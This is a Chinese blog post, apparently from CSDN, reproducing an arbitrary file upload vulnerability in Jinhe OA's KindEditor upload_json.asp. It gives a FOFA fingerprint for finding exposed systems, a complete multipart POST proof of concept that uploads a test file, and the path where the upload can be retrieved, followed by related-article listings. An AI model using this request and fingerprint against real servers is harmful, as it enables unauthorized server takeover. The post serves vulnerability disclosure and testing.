金和OA upload_json.asp存在任意文件上传漏洞

最新推荐文章于 2024-03-07 08:59:45 发布
最新推荐文章于 2024-03-07 08:59:45 发布
阅读量530 收藏 5
点赞数 10
分类专栏: 漏洞复现 文章标签: json 网络安全 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/luochen2436/article/details/135372385
版权

产品简介

金和网络是专业信息化服务商,为城市监管部门提供了互联网+监管解决方案,为企事业单位提供组织协同OA系统升开发平台,电子政务一体化平台智慧电商平合等服务

漏洞概述

金和OA upload_json.asp存在任意文件上传漏洞,攻击者可通过此漏洞获取服务器权限。

指纹识别

fofa:

app="金和网络-金和OA"

漏洞利用

poc:

POST /c6/KindEditor1/asp/upload_json.asp?dir=file HTTP/1.1
Host: your_ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
Content-Length: 338
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------153857212076213662067051609723

-----------------------------153857212076213662067051609723
Content-Disposition: form-data; name="localUrl"


-----------------------------153857212076213662067051609723
Content-Disposition: form-data; name="imgFile"; filename="hhh.txt"
Content-Type: image/png

hhh
-----------------------------153857212076213662067051609723--

在这里插入图片描述
访问返回包给的url

/c6/KindEditor1/asp/../attached/file/20240103/20240103164534323432.txt

在这里插入图片描述

修复建议

更新至最新安全版本

【红豆生南国,春来发枝冬凋敝,相思不如不相思。】

3tefanie丶zhou
关注
  • 10
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
OA_C6-自定义表单操作手册
09-13
针对OA_C6-自定义表单详细讲解手册
OA_C6_用户手册.pdf
03-05
OA_C6_用户手册,比较基本的一个介绍,适合入门级的学习以及人员培训使用。
和软件OA浏览器设置.doc
11-17
和软件OA浏览器设置.doc
OA _和C6产品白皮书
07-01
_和C6产品白皮书 ,有个朋友说需要,那就上传一个吧
asp 调用php上传图片,asp 版 本地图片上传问题!
weixin_35682010的博客
03-24 165
真的很简单~ 就是两个 点点 的问题~:( 真当是 人不学不知义 啊~:)为了让和我一样笨笨的人能节省些 宝贵的时间打麻将~:)我把 简单的代码贴出来~:)KE.show({id : 'content',imageUploadJson : '/admin/kindeditor/asp/upload_json.asp?spath=info/images',fileManagerJson :...
[应用漏洞]KindEditor<=4.1.5 文件上传漏洞利用
不忘初心,护天下安全!
07-23 2555
一、KindEditor KindEditor是一套开源的在线HTML编辑器,主要用于让用户在网站上获得所见即所得编辑效果 二、漏洞介绍 影响版本:KindEditor3.5.2~4.1 简介:Kindeditor能够上传doc,docx,xls,xlsx,ppt,htm,html,txt,zip,rar,gz,bz2,wps,pdf格式文件。支持 Java、.NET、PHP、ASP等程序。 漏洞存在证明: 根本脚本语言自定义不同的上传地址,上传之前有必要验证文件 upload_jso...
kindeditor在服务器上上传图片显示叉叉,什么原因?,kindeditor<=4.1.5 文件上传漏洞利用...
weixin_26820341的博客
08-11 1134
kindeditor<=4.1.5 文件上传漏洞 - Kindeditor <=4.1.5 file upload vulnerabilityanduse漏洞存影响版本:小于等于4.1.5的kindeditor 编辑器漏洞影响:上传任意. txt 和. html 文件漏洞存在动态脚本语言:php/asp/jsp/asp.net漏洞存在的证明文件:upload_json.* 具体...
[渗透]kindeditor4.1.5文件上传漏洞
热门推荐
胖胖的ALEX
03-04 1万+
漏洞等级:高危 Kindeditor是一套开源的HTML可视化编辑器,主要用于让用户在网站上获得所见即所得编辑效果,兼容IE、Firefox、Chrome、Safari、Opera等主流浏览器。 漏洞描述: Kindeditor能够上传doc,docx,xls,xlsx,ppt,htm,html,txt,zip,rar,gz,bz2,wps,pdf格式文件。支持 Java、.NET、PHP、ASP...
ASP中配置Kindeditor上传图片选择添加水印功能
qianjin_40的博客
11-15 1231
近日,升级了网站的editor,使用Kindeditor在做图片上传时写了一个小程序,可以自动添加水印,具体的代码也是在网络上找到的,刚好可以并用。以下是一些经验分享,希望能与大家交流,互相进步。   首先,配置好上传的路径,选择好程序语言,我使用的是ASP,比较落后吧!   第二步:修改plugins下的image/image.js,找到本地上传框代码: '',
OA C6 upload_json 任意文件上传漏洞
Keepb1ue的博客
01-09 530
和网络是专业信息化服务商,为城市监管部门提供了互联网+监管解决方案,为企事业单位提供组织协同OA系统开发平台,电子政务一体化平台,智慧电商平台等服务。OA C6 upload_json接口处存在任意文件上传漏洞,攻击者可以通过构造特殊请求包上传恶意后门文件,从而获取服务器权限。
OA C6 upload_json接口任意文件上传
最新发布
weixin_43567873的博客
03-07 19
OA C6 upload_json接口任意文件上传
OA Servlet接口任意文件上传漏洞
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
12-06 703
和数字化智能办公平台(简称JC6)是一款结合了人工智能技术的数字化办公平台,为企业带来了智能化的办公体验和全面的数字化转型支持。同时符合国家信创认证标准,支持组织数字化转型,实现业务流程的数字化、智能化和协同化,提高企业竞争力。
KindEditor 文件上传漏洞漏洞
mei_13的博客
07-31 9940
1 漏洞简介 1.1 漏洞描述 KindEditor是一套开源的HTML可视化编辑器,使用JavaScript编写,支持aspaspx、php、jsp,几乎支持了所有的网站,该编辑器主要用于让用户在网站上获得所见即所得编辑效果,兼容IE、Firefox、Chrome、Safari、Opera等主流浏览器,非常适合在CMS、商城、论坛、博客、Wiki、电子邮件等互联网应用上使用。且该编辑器支持上传功能,如果上传文件类型控制的不好,那么我们就能利用该漏洞,上传doc,docx,xls,xlsx,ppt,h
网站安全检测被 提示该网站内容被禁止访问
网站安全专家
05-11 1727
很多建站公司都在使用Kindeditor开源的图片上传系统,该上传系统是可视化的,采用的开发语言支持aspaspx、php、jsp,几乎支持了所有的网站可以使用他们的上传系统,对浏览器的兼容以及手机端也是比较不错的,用户使用以及编辑上传方面得到了很多用户的喜欢。 前端时间我们SINE安全对其进行全面的网站漏洞检测的时候发现,Kindeditor存在严重的上传漏洞,很多公司网站,以及事业单位的网...
改造kindeditor支持asp.net core mvc上传文件
FG7313的博客
09-28 241
kindtor默认使用的上传方法是使用目录下面的一般处理程序upload_json.ashx,暂时还不支持asp.net core下的文件上传,下面放出的自定义处理上传文件的接口方法。 自定义接收上传文件的action替换一般处理程序 代码如下: public class FileController : Controller { private r...
编辑器漏洞(配合文件上传等)
guanjian_ci的博客
03-23 5781
编辑器分类:ewebeditor、kindeditor、ckeditor、fckeditor、Cute Editor、ueditor、southidceditor等等 一、ewebeditor编辑器(数据库路径、文件上传、目录遍历、SQL注入等) (1)漏洞1 Admin_Login.asp 登录页面 Admin_Default.asp 管理首页 Admin_Style.asp 样式页面 Admin_UploadFile.asp 上...
常见编辑器的漏洞利用
weixin_43352659的博客
01-07 1588
常见编辑器的漏洞利用 kindeditor编辑器 kindeditor 4.1 文件上传漏洞(中危、不能拿shell) 1、漏洞问题: Kindeditor能够上传doc,docx,xls,xlsx,ppt,htm,html,txt,zip,rar,gz,bz2,wps,pdf格式文件且上传文件地 址通常携带“/kineditor/“的关键字。 找到对应/kindeditor/目录访问kind...
asp/php/asp.net网站后台HTML编辑器eWebEditor升级kindeditor编辑器
weixin_46096438的博客
07-12 806
asp/php/asp.net网站后台HTML编辑器eWebEditor升级kindeditor编辑器
oa jc6 ntko-upload 任意文件上传漏洞
01-16
然而,OA JC6和NTKO-Upload存在一个任意文件上传漏洞。该漏洞可能会被恶意攻击者利用,上传恶意文件,从而对系统造成潜在的安全风险。 恶意上传的文件可能包含恶意代码、病毒或其他有害的文件,攻击者可通过...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值